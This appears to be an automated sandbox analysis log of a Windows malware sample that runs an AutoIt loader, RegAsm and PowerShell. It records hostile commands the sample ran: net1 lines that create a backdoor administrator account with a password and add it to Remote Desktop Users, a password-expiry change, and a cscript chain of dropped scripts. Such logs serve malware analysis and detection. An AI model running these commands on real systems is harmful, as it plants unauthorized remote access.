Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 accounts /maxpwage:unlimited

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cscript.exe "c:\users\user\appdata\roaming\uenuq\54.vbs" fsuiweqmac zytfxcsika "c:\users\user\appdata\roaming\uenuq\578.vbs" "c:\users\user\appdata\roaming\uenuq\baccrsah.bat" "c:\users\user\appdata\roaming\uenuq\rbv.dll"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cscript.exe "c:\users\user\appdata\roaming\uenuq\54.vbs" fsuiweqmac zytfxcsika "c:\users\user\appdata\roaming\uenuq\578.vbs" "c:\users\user\appdata\roaming\uenuq\baccrsah.bat" "c:\users\user\appdata\roaming\uenuq\rbv.dll"

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C913DC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

7_2_00C913DC

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_00403FF2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00403FF2

Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BCE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000000.1703776630.0000000000CF3000.00000002.00000001.01000000.00000006.sdmp, Rifiutare.exe.com, 00000009.00000000.1706269043.0000000000CF3000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Rifiutare.exe.com, Uno.exe.com, Inebriato.exe.com	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000014.00000002.2259856509.0000000000D00000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: 0@`No errorInvalid argument%s.%08x\/0123456789ABCDEFNotification AreaShell_TrayWndTrayNotifyWndSysPager0123456789abcdefgenericunknown erroriostreamiostream stream errorsystemwusa.exe/quiet Google Chromeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid code lengths setinvalid bit length repeatinvalid code -- missing end-of-blockinvalid literal/lengths setinvalid distances setinvalid literal/length codeinvalid distance codeinvalid distance too far backincorrect header checkunknown compression methodinvalid window sizeunknown header flags setheader crc mismatchincorrect data checkincorrect length checkneed dictionarystream endfile errorstream errordata errorinsufficient memorybuffer errorincompatible version

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C50AB8 cpuid

7_2_00C50AB8

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_00403DC8

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
